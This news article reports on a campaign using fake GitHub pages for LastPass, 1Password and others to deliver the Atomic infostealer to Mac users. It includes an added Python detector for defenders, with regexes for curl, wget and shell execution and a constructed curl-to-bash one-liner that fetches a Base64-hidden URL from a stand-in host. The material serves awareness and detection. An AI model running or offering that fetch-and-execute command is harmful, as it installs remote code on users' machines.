Date: 2025-09-23

Mac users are being targeted by unknown threat actors offering malicious versions of well-known software, including LastPass, 1Password, and Thunderbird, via the developer platform GitHub.

According to the LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team, threat actors have launched a widespread infostealer campaign targeting Mac users through fraudulent GitHub repositories.

The campaign is designed to trick victims into installing what is presented as various companies’ software for macOS.

The threat actors have been impersonating a wide range of companies, including tech companies, financial institutions, and password managers. Indicators of Compromise (IoCs) show that, among others, LastPass, 1Password, Audacity, Robin Hood, Shopify, SurferSEO, Thunderbird, and Tweetdeck are being misused to deliver Atomic infostealer malware.

Threat actors use Search Engine Optimization (SEO) to ensure their malicious sites appear at the top of Bing and Google’s search engine result pages (SERPs).

For example, when users search for macOS, LastPass, and GitHub, the malicious GitHub page appears at the top of the search results. The GitHub page contains text and logos from the official software to appear trustworthy.

The site then redirects users to a malicious page, instructing them to copy and paste a command into their Mac’s terminal. The command issues a curl request, which downloads data from the internet. The URL is Base64-encoded, meaning that it isn’t written in plaintext but appears as a scrambled-looking string, which makes it less obvious to anyone inspecting the command.

Lastly, a shell script is downloaded, containing instructions for the operating system to execute. In this case, the script downloads the Atomic infostealer payload.
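For defenders reviewing a pasted command or shell history, the pattern described above (a Base64-encoded URL, a curl download, and shell execution in one line) can be checked mechanically. The following is an added example, not code from LastPass or from the original article; the function names, the regex lists, and the sample command are assumptions constructed for illustration, and the campaign's actual command is not reproduced here.

```python
import base64
import binascii
import re

# Runs of base64 alphabet long enough to hold a URL (threshold is an assumption).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"^https?://\S+$")
# Download tools and shell-execution markers: illustrative lists, not campaign IoCs.
FETCH = re.compile(r"\b(curl|wget)\b")
EXEC = re.compile(r"\|\s*(ba|z)?sh\b|\b(ba|z)?sh\s+-c\b|\beval\b")


def hidden_urls(command):
    """Return URLs present in the command only in base64-encoded form."""
    found = []
    for token in B64_TOKEN.findall(command):
        padded = token + "=" * (-len(token) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8").strip()
        except (binascii.Error, UnicodeDecodeError):
            continue  # ordinary word or path that merely looks like base64
        if URL.match(text):
            found.append(text)
    return found


def assess(command):
    """Flag a command holding an encoded URL plus a download tool and a shell marker."""
    urls = hidden_urls(command)
    fetches = bool(FETCH.search(command))
    executes = bool(EXEC.search(command))
    return {"decoded_urls": urls, "fetches": fetches, "executes": executes,
            "suspicious": bool(urls) and fetches and executes}


# Constructed sample input; the campaign's real command is not on this page.
SAMPLE_URL = "https://example.invalid/install.sh"
ENCODED = base64.b64encode(SAMPLE_URL.encode()).decode()
SAMPLE_PASTE = f'/bin/bash -c "$(curl -fsSL $(echo {ENCODED} | base64 -d))"'
BENIGN = "curl -fsSL https://example.invalid/install.sh -o install.sh"

if __name__ == "__main__":
    for cmd in (SAMPLE_PASTE, BENIGN):
        print(assess(cmd))
```

The check is a co-occurrence heuristic: it surfaces the decoded URL for an analyst to review and does not trace how the command passes data between its parts.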

“We are writing this blog post to raise awareness of the campaign and protect our customers while we continue to actively pursue takedown and disruption efforts, and to also share indicators of compromise (IoCs) to help other security teams detect cyber threats. We are actively monitoring this campaign and will update our blog post with any new information,” LastPass’s TIME team explains in a detailed blog post.